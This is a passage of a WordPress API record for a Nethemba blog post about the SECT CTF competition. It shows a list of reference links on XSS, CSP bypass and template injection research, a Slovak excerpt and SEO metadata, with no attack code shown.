'Open Sans', sans-serif;\">https:\/\/cure53.de\/es6-for-penetration-testers.pdf<\/span><\/a><\/div>\n<div><a href=\"https:\/\/github.com\/73696e65\/ctf-notes\/tree\/master\/2016-sect.ctf.rocks\"><span style=\"font-family: 'Open Sans', sans-serif;\">https:\/\/github.com\/73696e65\/ctf-notes\/tree\/master\/2016-sect.ctf.rocks<\/span><\/a><\/div>\n<div><a href=\"https:\/\/github.com\/cure53\/XSSChallengeWiki\/wiki\"><span style=\"font-family: 'Open Sans', sans-serif;\">https:\/\/github.com\/cure53\/XSSChallengeWiki\/wiki<\/span><\/a><\/div>\n<div><a href=\"https:\/\/conference.hitb.org\/hitbsecconf2016ams\/materials\/D1T2%20-%20Michele%20Spagnuolo%20and%20Lukas%20Weichselbaum%20-%20CSP%20Oddities.pdf\"><span style=\"font-family: 'Open Sans', sans-serif;\">https:\/\/conference.hitb.org\/hitbsecconf2016ams\/materials\/D1T2%20-%20Michele%20Spagnuolo%20and%20Lukas%20Weichselbaum%20-%20CSP%20Oddities.pdf<\/span><\/a><\/div>\n<div><a href=\"https:\/\/nvisium.com\/blog\/2016\/03\/09\/exploring-ssti-in-flask-jinja2\/\"><span style=\"font-family: 'Open Sans', sans-serif;\">https:\/\/nvisium.com\/blog\/2016\/03\/09\/exploring-ssti-in-flask-jinja2\/<\/span><\/a><\/div>\n<div><a href=\"https:\/\/nvisium.com\/blog\/2016\/03\/11\/exploring-ssti-in-flask-jinja2-part-ii\/\"><span style=\"font-family: 'Open Sans', sans-serif;\">https:\/\/nvisium.com\/blog\/2016\/03\/11\/exploring-ssti-in-flask-jinja2-part-ii\/<\/span><\/a><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\"><a href=\"https:\/\/blog.0daylabs.com\/2016\/09\/09\/bypassing-csp\/\">https:\/\/blog.0daylabs.com\/2016\/09\/09\/bypassing-csp\/<\/a><\/span><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Nieko\u013eko dn\u00ed nazad\u00a0sa konala vo \u0160v\u00e9dsku bezpe\u010dnostn\u00e1 konferencia SECT-T, ktorej s\u00fa\u010das\u0165ou bolo CTF. Vzh\u013eadom k tomu, \u017ee prebiehala po\u010das pracovn\u00fdch dn\u00ed sa CTF z\u00fa\u010dastnili len desiatky t\u00edmov (be\u017ene b\u00fdva \u00fa\u010das\u0165 nieko\u013ekon\u00e1sobne vy\u0161\u0161ia). Ako to na podobn\u00fdch CTF b\u00fdva, \u00falohy boli rozdelen\u00e9 do nieko\u013ek\u00fdch kateg\u00f3ri\u00ed, v tomto pr\u00edpade i\u0161lo o bin\u00e1rnu exploit\u00e1ciu, reverse engineering, weby a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[12],"tags":[1014,849,1016],"class_list":["post-2001","post","type-post","status-publish","format-standard","hentry","category-uncategorized-cs","tag-ctf-cs","tag-exploits-cs","tag-web-security"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>CTF sect.ctf.rocks - Nethemba<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/\" \/>\n<meta property=\"og:locale\" content=\"cs_CZ\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CTF sect.ctf.rocks - Nethemba\" \/>\n<meta property=\"og:description\" content=\"Nieko\u013eko dn\u00ed nazad\u00a0sa konala vo \u0160v\u00e9dsku bezpe\u010dnostn\u00e1 konferencia SECT-T, ktorej s\u00fa\u010das\u0165ou bolo CTF. Vzh\u013eadom k tomu, \u017ee prebiehala po\u010das pracovn\u00fdch dn\u00ed sa CTF z\u00fa\u010dastnili len desiatky t\u00edmov (be\u017ene b\u00fdva \u00fa\u010das\u0165 nieko\u013ekon\u00e1sobne vy\u0161\u0161ia). Ako to na podobn\u00fdch CTF b\u00fdva, \u00falohy boli rozdelen\u00e9 do nieko\u013ek\u00fdch kateg\u00f3ri\u00ed, v tomto pr\u00edpade i\u0161lo o bin\u00e1rnu exploit\u00e1ciu, reverse engineering, weby a [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/\" \/>\n<meta property=\"og:site_name\" content=\"Nethemba\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/nethemba\" \/>\n<meta property=\"article:published_time\" content=\"2016-09-12T13:19:58+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2016-09-13T07:36:31+00:00\" \/>\n<meta name=\"author\" content=\"Pavol Lupt\u00e1k\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@nethemba\" \/>\n<meta name=\"twitter:site\" content=\"@nethemba\" \/>\n<meta name=\"twitter:label1\" content=\"Napsal(a)\" \/>\n\t<meta name=\"twitter:data1\" content=\"Pavol Lupt\u00e1k\" \/>\n\t<meta name=\"twitter:label2\" content=\"Odhadovan\u00e1 doba \u010dten\u00ed\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minut\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/\"},\"author\":{\"name\":\"Pavol Lupt\u00e1k\",\"@id\":\"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234\"},\"headline\":\"CTF sect.ctf.rocks\",\"datePublished\":\"2016-09-12T13:19:58+00:00\",\"dateModified\":\"2016-09-13T07:36:31+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/\"},\"wordCount\":1396,\"commentCount\":0,\"keywords\":[\"ctf\",\"exploits\",\"web security\"],\"articleSection\":[\"Uncategorized @cs\"],\"inLanguage\":\"cs\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/\",\"url\":\"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/\",\"name\":\"CTF sect.ctf.rocks - Nethemba\",\"isPartOf\":{\"@id\":\"https:\/\/nethemba.com\/de\/#website\"},\"datePublished\":\"2016-09-12T13:19:58+00:00\",\"dateModified\":\"2016-09-13T07:36:31+00:00\",\"author\":{\"@id\":\"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234\"},\"breadcrumb\":{\"@id\":\"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/#breadcrumb\"},\"inLanguage\":\"cs\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/nethemba.com\/cs\/home-new-2025\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CTF sect.ctf.rocks\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nethemba.com\/de\/#website\",\"url\":\"https:\/\/nethemba.com\/de\/\",\"name\":\"Nethemba\",\"description\":\"We care about your security\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nethemba.com\/de\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"cs\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234\",\"name\":\"Pavol Lupt\u00e1k\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"cs\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g\",\"caption\":\"Pavol Lupt\u00e1k\"},\"sameAs\":[\"https:\/\/www.nethemba.com\/\"],\"url\":\"https:\/\/nethemba.com\/cs\/author\/nethemba-admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CTF sect.ctf.rocks - Nethemba","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/","og_locale":"cs_CZ","og_type":"article","og_title":"CTF sect.ctf.rocks - Nethemba","og_description":"Nieko\u013eko dn\u00ed nazad\u00a0sa konala vo \u0160v\u00e9dsku bezpe\u010dnostn\u00e1 konferencia SECT-T, ktorej s\u00fa\u010das\u0165ou bolo CTF. Vzh\u013eadom k tomu, \u017ee prebiehala po\u010das pracovn\u00fdch dn\u00ed sa CTF z\u00fa\u010dastnili len desiatky t\u00edmov (be\u017ene b\u00fdva \u00fa\u010das\u0165 nieko\u013ekon\u00e1sobne vy\u0161\u0161ia). Ako to na podobn\u00fdch CTF b\u00fdva, \u00falohy boli rozdelen\u00e9 do nieko\u013ek\u00fdch kateg\u00f3ri\u00ed, v tomto pr\u00edpade i\u0161lo o bin\u00e1rnu exploit\u00e1ciu, reverse engineering, weby a [&hellip;]","og_url":"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/","og_site_name":"Nethemba","article_publisher":"https:\/\/www.facebook.com\/nethemba","article_published_time":"2016-09-12T13:19:58+00:00","article_modified_time":"2016-09-13T07:36:31+00:00","author":"Pavol Lupt\u00e1k","twitter_card":"summary_large_image","twitter_creator":"@nethemba","twitter_site":"@nethemba","twitter_misc":{"Napsal(a)":"Pavol Lupt\u00e1k","Odhadovan\u00e1 doba \u010dten\u00ed":"8 minut"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/#article","isPartOf":{"@id":"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/"},"author":{"name":"Pavol Lupt\u00e1k","@id":"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234"},"headline":"CTF sect.ctf.rocks","datePublished":"2016-09-12T13:19:58+00:00","dateModified":"2016-09-13T07:36:31+00:00","mainEntityOfPage":{"@id":"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/"},"wordCount":1396,"commentCount":0,"keywords":["ctf","exploits","web security"],"articleSection":["Uncategorized @cs"],"inLanguage":"cs","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/","url":"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/","name":"CTF sect.ctf.rocks - Nethemba","isPartOf":{"@id":"https:\/\/nethemba.com\/de\/#website"},"datePublished":"2016-09-12T13:19:58+00:00","dateModified":"2016-09-13T07:36:31+00:00","author":{"@id":"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234"},"breadcrumb":{"@id":"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/#breadcrumb"},"inLanguage":"cs","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/nethemba.com\/cs\/home-new-2025\/"},{"@type":"ListItem","position":2,"name":"CTF sect.ctf.rocks"}]},{"@type":"WebSite","@id":"https:\/\/nethemba.com\/de\/#website","url":"https:\/\/nethemba.com\/de\/","name":"Nethemba","description":"We care about your security","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nethemba.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"cs"},{"@type":"Person","@id":"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234","name":"Pavol Lupt\u00e1k","image":{"@type":"ImageObject","inLanguage":"cs","@id":"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g","caption":"Pavol Lupt\u00e1k"},"sameAs":["https:\/\/www.nethemba.com\/"],"url":"https:\/\/nethemba.com\/cs\/author\/nethemba-admin\/"}]}},"_links":{"self":[{"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/posts\/2001","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/comments?post=2001"}],"version-history":[{"count":0,"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/posts\/2001\/revisions"}],"wp:attachment":[{"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/media?parent=2001"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/categories?post=2001"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/tags?post=2001"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}